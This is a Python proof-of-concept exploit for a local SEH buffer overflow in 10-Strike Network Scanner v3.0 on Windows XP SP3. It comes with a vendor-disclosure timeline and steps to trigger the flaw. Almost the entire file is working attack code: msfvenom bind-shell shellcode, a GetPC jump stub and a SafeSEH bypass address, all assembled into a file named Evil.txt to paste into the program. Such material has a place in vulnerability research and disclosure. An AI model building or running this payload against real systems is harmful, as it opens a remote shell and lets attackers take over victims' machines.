#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Scanner v3.0 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe #
# Tested on : Windows XP Professional - SP3 (x86) #
#----------------------------------------------------------------------------------------------------------#

# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published

'''
Steps to reproduce:
===================
- Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
- Right-click on newly created host and click 'Trace route...'.
- Repeat the second step: the second 'Trace route...' triggers the overflow and the bind-shell payload runs.
Notes:
======
- The byte 0x00 gets converted to 0x20 by the program, which rules out [pop, pop, retn] pointers in the base binary
  and makes 0x00 a bad character for the payload (0x0a and 0x0d were excluded from the msfvenom run as well).
- All loaded modules are compiled with /SafeSEH, so the handler address used below (0x7ffc0518) was chosen outside of them.
- Right-click on the newly created host and choose 'System information > General': it is affected by the same
  vulnerability, with different offsets and buffer size.
'''

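# root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
# Payload size: 355 bytes
#
# Everything below is a bytes literal (b"...", valid on Python 2.6+ and 3) so
# the payload is emitted byte-for-byte. Plain "..." str literals would be
# UTF-8 encoded by a text-mode open() on Python 3 and shift every offset.
# Bad characters excluded at generation time: 0x00 (the target rewrites it to
# 0x20, see the notes above), 0x0a and 0x0d.
shellcode = (
    b"\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
    b"\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
    b"\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
    b"\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
    b"\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
    b"\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
    b"\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
    b"\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
    b"\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
    b"\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
    b"\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
    b"\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
    b"\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
    b"\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
    b"\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
    b"\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
    b"\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
    b"\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
    b"\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
    b"\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
    b"\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
    b"\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
    b"\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
    b"\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
    b"\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
    b"\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
    b"\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
    b"\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
    b"\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
    b"\x19\xb3\x97\x5c\x8e\xb4\xbd"
)

# GetPC stub: after the SEH pop/pop/ret lands in nSEH, execution is 500+
# bytes past the shellcode and a short jump cannot reach it, so this stub
# computes its own address and jumps 512 bytes backwards into the NOP sled.
# With the stub at buffer offset 529 (see layout below): 529 + 10 - 512 = 27,
# the last NOP of the sled, which slides into the shellcode at offset 28.
# NOTE: the arithmetic is byte-wise (cl / ch); it assumes the +10 does not
# carry out of cl and the -0x200 does not borrow below ch. That held for the
# tested stack address -- re-check if the buffer lands elsewhere.
magic = (
    b"\xd9\xee"          # fldz               (last FPU instruction -> its address is recorded)
    b"\xd9\x74\x24\xf4"  # fnstenv [esp-0xc]  (saved FPU IP, env offset 0xc, lands at [esp])
    b"\x59"              # pop ecx            -> ecx = address of the fldz above
    b"\x80\xc1\x05"      # add cl,0x5
    b"\x80\xc1\x05"      # add cl,0x5         (two adds, presumably because 'add cl,0xa' would embed the 0x0a bad byte)
    b"\x90"              # nop
    b"\xfe\xcd"          # dec ch
    b"\xfe\xcd"          # dec ch             -> ecx -= 0x200, i.e. -512 in total
    b"\xff\xe1"          # jmp ecx
)

# Buffer layout (offsets from the start of Evil.txt):
#   0    28 x 0x90            NOP sled
#   28   shellcode            bind shell (355 bytes)
#   383  0xcc filler          int3 up to nSEH
#   516  nSEH  75 06 74 06    jnz +6 / jz +6: one is always taken, both land
#                             past the 4-byte SEH slot in the NOPs below
#   520  SEH   0x7ffc0518     pop edi / pop edi / ret, tagged "SafeSEH bypass"
#                             by the author; per the notes every module is
#                             /SafeSEH, so this is a non-module address
#                             specific to the tested XP SP3 x86 build
#   524  5 x 0x90             NOPs
#   529  magic                GetPC stub, jumps back to offset 27
#   549  0xcc junk            padding to 3000 bytes total
NSEH_OFFSET = 516
SLED_SIZE = 28
TOTAL_SIZE = 3000

# The filler multiplier goes negative (and silently empty) if the payload
# outgrows the gap before nSEH, which would wreck every offset above.
if len(shellcode) > NSEH_OFFSET - SLED_SIZE:
    raise ValueError("shellcode (%d bytes) does not fit in the %d-byte gap before nSEH"
                     % (len(shellcode), NSEH_OFFSET - SLED_SIZE))

buffer = b"".join([
    b"\x90" * SLED_SIZE,                                        # NOP sled
    shellcode,                                                  # bind shell
    b"\xcc" * (NSEH_OFFSET - SLED_SIZE - len(shellcode)),       # filler to nSEH
    b"\x75\x06\x74\x06",                                        # nSEH | jnz/jz +6 over the SEH slot
    b"\x18\x05\xfc\x7f",                                        # SEH  | 0x7ffc0518 : pop edi # pop edi # ret
    b"\x90" * 5,                                                # NOPs
    magic,                                                      # jump -512 into the sled
    b"\xcc" * (TOTAL_SIZE - NSEH_OFFSET - 4 - 4 - 5 - len(magic)),  # junk up to 3000 bytes
])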

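# Write the payload out byte-for-byte. Binary mode is essential: a text-mode
# open() would UTF-8 encode every byte >= 0x80 on Python 3, and on Windows
# Python 2 would rewrite any 0x0a as 0x0d 0x0a -- either silently shifts the
# offsets the buffer layout depends on.
try:
    # bytes is str on Python 2; on Python 3 a str payload must map 1:1 to bytes.
    payload = buffer if isinstance(buffer, bytes) else buffer.encode("latin-1")
    with open("Evil.txt", "wb") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError) as e:
    # e.g. unwritable working directory: report it, as the original did.
    print(e)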